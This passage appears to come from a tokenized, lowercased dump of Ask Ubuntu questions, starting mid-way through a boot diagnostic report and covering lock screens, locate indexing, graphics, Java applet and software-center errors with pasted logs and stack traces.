-- -- -- -- -- -- -- -- -- [ boot loader ] timeout=1 default=multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 1 ) \windows [ operating systems ] multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 1 ) \windows= '' microsoft windows xp home edition '' /noexecute=optin /fastdetect -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =========================== sda7/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda7/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda7 during installation uuid=7cfe4896-1943-4625-b1c3-2c17aa6b1b47 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=17554fb8-462b-4666-84b2-dba91401d9cc none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda7 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) = boot/grub/core.img 1 = boot/grub/grub.cfg 1 = boot/initrd.img-3.8.0-29-generic 1 = boot/initrd.img-3.8.0-39-generic 1 = boot/vmlinuz-3.8.0-29-generic 2 = boot/vmlinuz-3.8.0-39-generic 1 = initrd.img.old 1 = vmlinuz 1 = vmlinuz.old 2 ======================== unknown mbrs/boot sectors/etc : ======================== unknown bootloader on sda2 00000000 1d e8 fd 63 2f 87 52 03 c0 29 ae 7e 8d 9a 06 b7 | ... c/.r.. ) .~ ... .| 00000010 ec 38 2c 9b a5 66 70 5e b2 06 65 45 9d 56 12 6a |.8 , ..fp^..ee.v.j| 00000020 54 af 54 b2 3a ae c8 7b bd 26 ce 64 ed bf 54 36 |t.t. : .. { . & .d..t6| 00000030 23 45 8b 28 24 c9 d5 30 5b fc b5 ac 6a 7c 8b 4a | # e . ( $ ..0 [ ... j|.j| 00000040 47 0f 4b 6a cd 9b ec 4f 67 d9 04 b7 94 eb e0 00 |g.kj ... og ... ... .| 00000050 c6 68 2d e0 a3 76 e6 62 44 d5 ab 70 7e bc 5a b8 |.h-..v.bd..p~.z.| 00000060 bb a9 15 1d 16 28 66 09 f5 c9 80 8b 44 f9 2a 30 | ... .. ( f ... ..d.*0| 00000070 02 32 5e 85 61 ef 57 e0 e6 c5 dd d0 21 8c 0f 65 |.2^.a.w ... .. ! ..e| 00000080 3f 4f 5c 71 e6 df cd fc 02 20 d6 16 f9 6a 40 0a | ? o\q ... .. ... j @ .| 00000090 f7 c7 62 b8 e7 5c 8c 6b 02 79 d2 f8 b9 8c a1 9c |..b..\.k.y ... ... | 000000a0 16 3a e8 b4 0b 7a 99 e6 b4 de 9b a5 d3 c3 ee ec | . : ... z ... ... ... .| 000000b0 a3 4c 1f ec df 31 fa 01 e9 b2 eb 72 4a d6 29 ab |.l ... 1 ... ..rj . ) .| 000000c0 06 6e a9 d4 a9 d4 35 61 2e 40 eb 6b e3 d2 88 75 |.n ... .5a . @ .k ... u| 000000d0 c9 d8 2b 60 30 1c 34 0f 0f ad 6d a7 60 ff 33 9f |..+`0.4 ... m.`.3.| 000000e0 08 35 4b 85 ba ed 49 17 7d 76 e7 e8 85 fc 82 a2 |.5k ... i . } v ... ... | 000000f0 4a 17 96 af 48 ef da 03 05 a9 75 2b 58 18 6a 13 |j ... h ... ..u+x.j.| 00000100 e6 8a ad 36 c0 18 10 2e e3 85 15 0e f1 40 77 2b | ... 6 ... ... ... @ w+| 00000110 dc 1f 4f 5a 9f ae 28 f3 36 f8 8f 84 cc 0d 95 85 |..oz.. ( .6 ... ... .| 00000120 47 2a ba 80 fe 1c a3 e4 8d 79 98 26 ad f9 37 28 |g* ... ... .y. & ..7 ( | 00000130 f6 08 f1 a3 4c 20 e8 36 e3 70 8f 97 8b 00 24 b7 | ... .l .6.p ... . $ .| 00000140 17 ee 9e 8c 37 73 2e 5b af 11 2a a1 d5 bd aa 5e | ... .7s. [ .. * ... .^| 00000150 b9 57 af 6b 4e 3c 93 68 a0 85 28 9a a4 b0 88 85 |.w.kn < .h.. ( ... ..| 00000160 1b 84 72 fa c1 82 d1 71 ee 91 94 63 58 15 9e 8d |..r ... .q ... cx ... | 00000170 6c 9f 58 27 f8 e4 9d 66 33 3e a7 b3 ce 49 c5 52 |l.x ' ... f3 > ... i.r| 00000180 63 3b 22 33 b2 75 15 b8 44 84 4b fb 43 a8 ed 0c |c ; '' 3.u..d.k.c ... | 00000190 4e 48 23 52 30 9f 4f 0c 49 46 59 f9 29 09 a7 5f |nh # r0.o.ify . ) .._| 000001a0 d2 49 75 b2 bf bd 8e 36 47 6c 32 26 2d 44 31 84 |.iu ... .6gl2 & -d1.| 000001b0 d9 82 cd 54 84 4b 69 31 6a 29 e2 93 96 70 00 fe | ... t.ki1j ) ... p..| 000001c0 ff ff 82 fe ff ff 02 88 29 03 00 a8 7f 00 00 fe | ... ... .. ) ... ... .| 000001d0 ff ff 05 fe ff ff 01 00 00 00 01 18 3a 01 00 00 | ... ... ... ... : ... | 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa | ... ... ... ... ..u.| 00000200 ========= devices which do n't seem to have a corresponding hard drive : ========= sdb sdc sdd =============================== stderr messages : =============================== xz : ( stdin ) : compressed data is corrupt xz : ( stdin ) : compressed data is corrupt awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in i 've seen different variations of this problem described online , but not the exact same problem , and i did n't want to fiddle too deep with things i do n't understand . could anyone help me ?
460528	lock screen asks for root password which i never set	i recently installed ubuntu server on my server and i found out it had no gui by default . so i installed that with the help of this page everything seemed to be fine so i started copying some files to my server . when i checked it to see if it was done i saw the lock screen that asked for the root password . but i never set that password so i tried a the password i set for my user account . i also tried the following passwords : root , admin , ( nothing ) and ( spacebar ) . i searched the internet and found out that there is no default password for root . am i stuck in this lock screen ? how should i shut the computer down ? ( there is no shutdown button in the lock screen )
460535	how do i tell locate to keep the index of an external hdd ?	i changed my configuration so locate is also searching through external harddisks that are mounted in /media . my /etc/updatedb.conf : prune_bind_mounts= '' yes '' # prunenames= '' .git .bzr .hg .svn '' prunepaths= '' /tmp /var/spool /home/.ecryptfs /media/win8 '' prunefs= ... ( rest is default ) my main hdd i always use is /media/rubo77/data if it is connected , and i run updatedb it is indexed , but each time i atart my computer with detached hdd the dayly /etc/cron.daily/mlocate is clearing that up . i would like to be able to find files on the detached device too . if i do n't want to i can always use locate -e that only shows currently existing files . how can i tell locate to keep the index for files in media if the drive is not mounted so i can locate files on the detached device ?
460536	find specific word in all files in and beneath current directory	i want to find all files , and print the path and filename , for any file where the text `` numlock '' is used - whether it is lower- , upper- or mixed-case . what command should i use ?
460537	wallpapers are merged with multiple images after suspend	i am using ubuntu 14.04 with gnome 3 . i have multiple wallpapers in rotation . when i suspend my computer and i go back , my wallpapers are merged as you can see here : in addition , i ca n't do a right click on my desktop . is there something to do to solve this problem ?
460538	ubuntu 14.04 wireless disabled	wireless interface ralink rt2500 is disabled , it 's disabled by hardware switch and all network selections are disabled
460539	installing cinema 4d	can someone tell me , or make a tutorial of how to install cinema 4d from maxon on my ubuntu 14.04 ? i have already tried with wine and it does n't work . thanks
460540	ubuntu is running in low graphics mode after numpad changes	yesterday i wanted to make my ubuntu 14.04 automatically boot with the numpad [ on ] . i used this thread as tutorial : how to enable numlock at boot time for login screen ? i rebooted my pc and now ubuntu is running in low graphics mode . i do n't know how to fix this and did n't found a solution on google . i hope you can help me . greetings , deidara my system cpu : intel core i7 4770k 4x @ 4.3ghz ram : 16gb by geil + 8gb by gskill gpu : msi `` twinfrozr '' geforce gtx 770 oc display : samsung t24c350 24 '' fullhd board : gigabyte z87 hd3 hdd : wdc @ 1tb & seagate @ 4tb ssd : samsung 840 evo @ 250gb
460542	how this command works	i see this command on other forums as a question for registering '' date -u + % v $ ( uname ) |sha256sum|sed 's/\w//g ' '' i think it depends on the time of my pc witch change every second .. but the output still the same every time i try it .. so can some one please advise how this command work
460543	error running java web application with openjdk java7 runtime in ubuntu 14.04	i have fresh ubuntu 14.04 install on my hp pavilion g6 laptop . i have installed openjdk and icedtea plugin in order to run java applications as explained here . but when i am going to chess.com website and select play against computer option it is showing an error . `` click here for details an exception has occurred '' then i ran firefox from terminal and opened java application again . terminal output is like bibi @ bibi-hp-pavilion-g6-notebook-pc : ~ $ firefox ( process:32619 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed java version `` 1.7.0_55 '' openjdk runtime environment ( icedtea 2.4.7 ) ( 7u55-2.4.7-1ubuntu1 ) openjdk 64-bit server vm ( build 24.51-b03 , mixed mode ) no permission to use the keyboard api for http : //googleads.g.doubleclick.net java.io.filenotfoundexception : http : //www.chess.com/play/chessapplet.1.14.18.jar at sun.reflect.nativeconstructoraccessorimpl.newinstance0 ( native method ) at sun.reflect.nativeconstructoraccessorimpl.newinstance ( nativeconstructoraccessorimpl.java:57 ) at sun.reflect.delegatingconstructoraccessorimpl.newinstance ( delegatingconstructoraccessorimpl.java:45 ) at java.lang.reflect.constructor.newinstance ( constructor.java:526 ) at sun.net.www.protocol.http.httpurlconnection $ 6.run ( httpurlconnection.java:1675 ) at sun.net.www.protocol.http.httpurlconnection $ 6.run ( httpurlconnection.java:1673 ) at java.security.accesscontroller.doprivileged ( native method ) at sun.net.www.protocol.http.httpurlconnection.getchainedexception ( httpurlconnection.java:1671 ) at sun.net.www.protocol.http.httpurlconnection.getinputstream ( httpurlconnection.java:1244 ) at net.sourceforge.jnlp.util.httputils.consumeandcloseconnection ( httputils.java:66 ) at net.sourceforge.jnlp.util.httputils.consumeandcloseconnectionsilently ( httputils.java:52 ) at net.sourceforge.jnlp.cache.resourcetracker.geturlresponsecodewithredirectonresult ( resourcetracker.java:907 ) at net.sourceforge.jnlp.cache.resourcetracker.findbesturl ( resourcetracker.java:955 ) at net.sourceforge.jnlp.cache.resourcetracker.initializeresource ( resourcetracker.java:788 ) at net.sourceforge.jnlp.cache.resourcetracker.processresource ( resourcetracker.java:628 ) at net.sourceforge.jnlp.cache.resourcetracker.access $ 600 ( resourcetracker.java:79 ) at net.sourceforge.jnlp.cache.resourcetracker $ downloader $ 1.run ( resourcetracker.java:1235 ) at net.sourceforge.jnlp.cache.resourcetracker $ downloader $ 1.run ( resourcetracker.java:1233 ) at java.security.accesscontroller.doprivileged ( native method ) at net.sourceforge.jnlp.cache.resourcetracker $ downloader.run ( resourcetracker.java:1233 ) at java.lang.thread.run ( thread.java:744 ) caused by : java.io.filenotfoundexception : http : //www.chess.com/play/chessapplet.1.14.18.jar at sun.net.www.protocol.http.httpurlconnection.getinputstream ( httpurlconnection.java:1624 ) at java.net.httpurlconnection.getresponsecode ( httpurlconnection.java:468 ) at net.sourceforge.jnlp.cache.resourcetracker.geturlresponsecodewithredirectonresult ( resourcetracker.java:903 ) ... 9 more java.io.filenotfoundexception : http : //www.chess.com/play/chessapplet.1.14.18.jar at sun.reflect.nativeconstructoraccessorimpl.newinstance0 ( native method ) at sun.reflect.nativeconstructoraccessorimpl.newinstance ( nativeconstructoraccessorimpl.java:57 ) at sun.reflect.delegatingconstructoraccessorimpl.newinstance ( delegatingconstructoraccessorimpl.java:45 ) at java.lang.reflect.constructor.newinstance ( constructor.java:526 ) at sun.net.www.protocol.http.httpurlconnection $ 6.run ( httpurlconnection.java:1675 ) at sun.net.www.protocol.http.httpurlconnection $ 6.run ( httpurlconnection.java:1673 ) at java.security.accesscontroller.doprivileged ( native method ) at sun.net.www.protocol.http.httpurlconnection.getchainedexception ( httpurlconnection.java:1671 ) at sun.net.www.protocol.http.httpurlconnection.getinputstream ( httpurlconnection.java:1244 ) at net.sourceforge.jnlp.util.httputils.consumeandcloseconnection ( httputils.java:66 ) at net.sourceforge.jnlp.util.httputils.consumeandcloseconnectionsilently ( httputils.java:52 ) at net.sourceforge.jnlp.cache.resourcetracker.geturlresponsecodewithredirectonresult ( resourcetracker.java:907 ) at net.sourceforge.jnlp.cache.resourcetracker.findbesturl ( resourcetracker.java:955 ) at net.sourceforge.jnlp.cache.resourcetracker.initializeresource ( resourcetracker.java:788 ) at net.sourceforge.jnlp.cache.resourcetracker.processresource ( resourcetracker.java:628 ) at net.sourceforge.jnlp.cache.resourcetracker.access $ 600 ( resourcetracker.java:79 ) at net.sourceforge.jnlp.cache.resourcetracker $ downloader $ 1.run ( resourcetracker.java:1235 ) at net.sourceforge.jnlp.cache.resourcetracker $ downloader $ 1.run ( resourcetracker.java:1233 ) at java.security.accesscontroller.doprivileged ( native method ) at net.sourceforge.jnlp.cache.resourcetracker $ downloader.run ( resourcetracker.java:1233 ) at java.lang.thread.run ( thread.java:744 ) caused by : java.io.filenotfoundexception : http : //www.chess.com/play/chessapplet.1.14.18.jar at sun.net.www.protocol.http.httpurlconnection.getinputstream ( httpurlconnection.java:1624 ) at java.net.httpurlconnection.getresponsecode ( httpurlconnection.java:468 ) at net.sourceforge.jnlp.cache.resourcetracker.geturlresponsecodewithredirectonresult ( resourcetracker.java:903 ) ... 9 more no permission to use the keyboard api for http : //googleads.g.doubleclick.net java.io.filenotfoundexception : http : //www.chess.com/play/chessapplet.1.14.18.jar at sun.reflect.nativeconstructoraccessorimpl.newinstance0 ( native method ) at sun.reflect.nativeconstructoraccessorimpl.newinstance ( nativeconstructoraccessorimpl.java:57 ) at sun.reflect.delegatingconstructoraccessorimpl.newinstance ( delegatingconstructoraccessorimpl.java:45 ) at java.lang.reflect.constructor.newinstance ( constructor.java:526 ) at sun.net.www.protocol.http.httpurlconnection $ 6.run ( httpurlconnection.java:1675 ) at sun.net.www.protocol.http.httpurlconnection $ 6.run ( httpurlconnection.java:1673 ) at java.security.accesscontroller.doprivileged ( native method ) at sun.net.www.protocol.http.httpurlconnection.getchainedexception ( httpurlconnection.java:1671 ) at sun.net.www.protocol.http.httpurlconnection.getinputstream ( httpurlconnection.java:1244 ) at net.sourceforge.jnlp.util.httputils.consumeandcloseconnection ( httputils.java:66 ) at net.sourceforge.jnlp.util.httputils.consumeandcloseconnectionsilently ( httputils.java:52 ) at net.sourceforge.jnlp.cache.resourcetracker.geturlresponsecodewithredirectonresult ( resourcetracker.java:907 ) at net.sourceforge.jnlp.cache.resourcetracker.findbesturl ( resourcetracker.java:955 ) at net.sourceforge.jnlp.cache.resourcetracker.initializeresource ( resourcetracker.java:788 ) at net.sourceforge.jnlp.cache.resourcetracker.processresource ( resourcetracker.java:628 ) at net.sourceforge.jnlp.cache.resourcetracker.access $ 600 ( resourcetracker.java:79 ) at net.sourceforge.jnlp.cache.resourcetracker $ downloader $ 1.run ( resourcetracker.java:1235 ) at net.sourceforge.jnlp.cache.resourcetracker $ downloader $ 1.run ( resourcetracker.java:1233 ) at java.security.accesscontroller.doprivileged ( native method ) at net.sourceforge.jnlp.cache.resourcetracker $ downloader.run ( resourcetracker.java:1233 ) at java.lang.thread.run ( thread.java:744 ) caused by : java.io.filenotfoundexception : http : //www.chess.com/play/chessapplet.1.14.18.jar at sun.net.www.protocol.http.httpurlconnection.getinputstream ( httpurlconnection.java:1624 ) at java.net.httpurlconnection.getresponsecode ( httpurlconnection.java:468 ) at net.sourceforge.jnlp.cache.resourcetracker.geturlresponsecodewithredirectonresult ( resourcetracker.java:903 ) ... 9 more java.io.filenotfoundexception : http : //www.chess.com/play/chessapplet.1.14.18.jar at sun.reflect.nativeconstructoraccessorimpl.newinstance0 ( native method ) at sun.reflect.nativeconstructoraccessorimpl.newinstance ( nativeconstructoraccessorimpl.java:57 ) at sun.reflect.delegatingconstructoraccessorimpl.newinstance ( delegatingconstructoraccessorimpl.java:45 ) at java.lang.reflect.constructor.newinstance ( constructor.java:526 ) at sun.net.www.protocol.http.httpurlconnection $ 6.run ( httpurlconnection.java:1675 ) at sun.net.www.protocol.http.httpurlconnection $ 6.run ( httpurlconnection.java:1673 ) at java.security.accesscontroller.doprivileged ( native method ) at sun.net.www.protocol.http.httpurlconnection.getchainedexception ( httpurlconnection.java:1671 ) at sun.net.www.protocol.http.httpurlconnection.getinputstream ( httpurlconnection.java:1244 ) at net.sourceforge.jnlp.util.httputils.consumeandcloseconnection ( httputils.java:66 ) at net.sourceforge.jnlp.util.httputils.consumeandcloseconnectionsilently ( httputils.java:52 ) at net.sourceforge.jnlp.cache.resourcetracker.geturlresponsecodewithredirectonresult ( resourcetracker.java:907 ) at net.sourceforge.jnlp.cache.resourcetracker.findbesturl ( resourcetracker.java:955 ) at net.sourceforge.jnlp.cache.resourcetracker.initializeresource ( resourcetracker.java:788 ) at net.sourceforge.jnlp.cache.resourcetracker.processresource ( resourcetracker.java:628 ) at net.sourceforge.jnlp.cache.resourcetracker.access $ 600 ( resourcetracker.java:79 ) at net.sourceforge.jnlp.cache.resourcetracker $ downloader $ 1.run ( resourcetracker.java:1235 ) at net.sourceforge.jnlp.cache.resourcetracker $ downloader $ 1.run ( resourcetracker.java:1233 ) at java.security.accesscontroller.doprivileged ( native method ) at net.sourceforge.jnlp.cache.resourcetracker $ downloader.run ( resourcetracker.java:1233 ) at java.lang.thread.run ( thread.java:744 ) caused by : java.io.filenotfoundexception : http : //www.chess.com/play/chessapplet.1.14.18.jar at sun.net.www.protocol.http.httpurlconnection.getinputstream ( httpurlconnection.java:1624 ) at java.net.httpurlconnection.getresponsecode ( httpurlconnection.java:468 ) at net.sourceforge.jnlp.cache.resourcetracker.geturlresponsecodewithredirectonresult ( resourcetracker.java:903 ) ... 9 more attempted to download http : //www.chess.com/play/chessapplet.1.14.18.jar , but failed to connect ! jar http : //www.chess.com/play/chessapplet.1.14.18.jar not found . continuing . jar http : //www.chess.com/play/chessapplet.1.14.18.jar not found . continuing . netx : initialization error : could not initialize applet . ( fatal : initialization error : unknown main-class . could not determine the main class for this application . ) netx : initialization error : could not initialize applet . ( fatal : initialization error : unknown main-class . could not determine the main class for this application . ) net.sourceforge.jnlp.launchexception : fatal : initialization error : could not initialize applet . for more information click `` more information button '' . at net.sourceforge.jnlp.launcher.createapplet ( launcher.java:746 ) at net.sourceforge.jnlp.launcher.getapplet ( launcher.java:675 ) at net.sourceforge.jnlp.launcher $ tgthread.run ( launcher.java:908 ) caused by : net.sourceforge.jnlp.launchexception : fatal : initialization error : unknown main-class . could not determine the main class for this application . at net.sourceforge.jnlp.runtime.jnlpclassloader.initializeresources ( jnlpclassloader.java:684 ) at net.sourceforge.jnlp.runtime.jnlpclassloader. < init ( jnlpclassloader.java:277 ) at net.sourceforge.jnlp.runtime.jnlpclassloader.createinstance ( jnlpclassloader.java:351 ) at net.sourceforge.jnlp.runtime.jnlpclassloader.getinstance ( jnlpclassloader.java:418 ) at net.sourceforge.jnlp.runtime.jnlpclassloader.getinstance ( jnlpclassloader.java:394 ) at net.sourceforge.jnlp.launcher.createapplet ( launcher.java:711 ) ... 2 more net.sourceforge.jnlp.launchexception : fatal : initialization error : could not initialize applet . for more information click `` more information button '' . at net.sourceforge.jnlp.launcher.createapplet ( launcher.java:746 ) at net.sourceforge.jnlp.launcher.getapplet ( launcher.java:675 ) at net.sourceforge.jnlp.launcher $ tgthread.run ( launcher.java:908 ) caused by : net.sourceforge.jnlp.launchexception : fatal : initialization error : unknown main-class . could not determine the main class for this application . at net.sourceforge.jnlp.runtime.jnlpclassloader.initializeresources ( jnlpclassloader.java:684 ) at net.sourceforge.jnlp.runtime.jnlpclassloader. < init ( jnlpclassloader.java:277 ) at net.sourceforge.jnlp.runtime.jnlpclassloader.createinstance ( jnlpclassloader.java:351 ) at net.sourceforge.jnlp.runtime.jnlpclassloader.getinstance ( jnlpclassloader.java:418 ) at net.sourceforge.jnlp.runtime.jnlpclassloader.getinstance ( jnlpclassloader.java:394 ) at net.sourceforge.jnlp.launcher.createapplet ( launcher.java:711 ) ... 2 more error on java side : error : unable to fetch applet instance id from java side . error on java side : error : unable to fetch applet instance id from java side . note : child process received `goodbye ' , closing down note : child process received `goodbye ' , closing down bibi @ bibi-hp-pavilion-g6-notebook-pc : ~ $ is there any solution for this problem ? any help would be appreciated . thank you .
460545	what happened whith software-center - authentification failed ?	2014-05-04 16:00:34,847 - softwarecenter.backend.zeitgeist_logger - warning - support for zeitgeist disabled 2014-05-04 16:00:35,910 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-05-04 16:00:42,923 - softwarecenter.region - warning - failed to use geoclue : 'org.freedesktop.geoclue.error.notavailable : geoclue master client has no usable address providers' 2014-05-04 16:00:44,763 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2014-05-04 16:00:44,822 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2014-05-04 16:00:44,883 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2014-05-04 16:00:44,883 - root - error - could not find any typelib for launchpadintegration 2014-05-04 16:00:45,280 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) no bp log location saved , using default . [ 000:000 ] cpu : 15.2.7 , x1 , 2405mhz , 1001mb [ 000:000 ] computer model : not available no bp log location saved , using default . [ 000:000 ] cpu : 15.2.7 , x1 , 2405mhz , 1001mb [ 000:000 ] computer model : not available [ 000:000 ] browser xembed support present : 1 [ 000:000 ] browser toolkit is gtk2 . [ 000:001 ] using gtk2 toolkit [ 000:092 ] warning ( optionsfile.cc:47 ) : load : could not open file , err=2 [ 000:092 ] no bp log location saved , using default . [ 000:093 ] cpu : 15.2.7 , x1 , 2405mhz , 1001mb [ 000:093 ] computer model : not available [ 000:003 ] warning ( optionsfile.cc:47 ) : load : could not open file , err=2 [ 000:003 ] no bp log location saved , using default . [ 000:004 ] cpu : 15.2.7 , x1 , 2405mhz , 1001mb [ 000:004 ] computer model : not available [ 000:004 ] browser xembed support present : 1 [ 000:004 ] browser toolkit is gtk2 . [ 000:004 ] using gtk2 toolkit /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 175 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 193 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 205 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 219 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 228 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 238 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 248 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 257 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 266 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 275 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 284 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 293 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 318 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 333 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 342 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 351 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 360 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 386 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 410 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 425 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 449 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 461 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 470 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 479 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 496 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 505 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 514 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 523 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 548 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 557 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 580 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 589 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 598 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 607 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 616 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 635 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 644 was not found when attempting to remove it glib.source_remove ( self._timeout ) 2014-05-04 16:07:18,078 - softwarecenter.backend.reviews - warning - error creating bsddb : ' ( 22 , 'invalid argument -- bdb0054 illegal flag combination specified to db_env- > open ' ) ' ( corrupted ? ) 2014-05-04 16:07:18,358 - softwarecenter.backend.reviews - error - trying to repair db failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/backend/reviews/__init__.py '' , line 358 , in _save_review_stats_cache_blocking self._dump_bsddbm_for_unity ( outfile , outdir ) file `` /usr/share/software-center/softwarecenter/backend/reviews/__init__.py '' , line 377 , in _dump_bsddbm_for_unity 0600 ) dbinvalidargerror : ( 22 , 'invalid argument -- bdb0054 illegal flag combination specified to db_env- > open ' ) /usr/bin/software-center:184 : warning : source id 75 was not found when attempting to remove it gtk.main ( ) /usr/bin/software-center:184 : warning : source id 142 was not found when attempting to remove it gtk.main ( ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 653 was not found when attempting to remove it glib.source_remove ( self._timeout ) 2014-05-04 16:07:20,742 - softwarecenter.region - warning - failed to use geoclue : 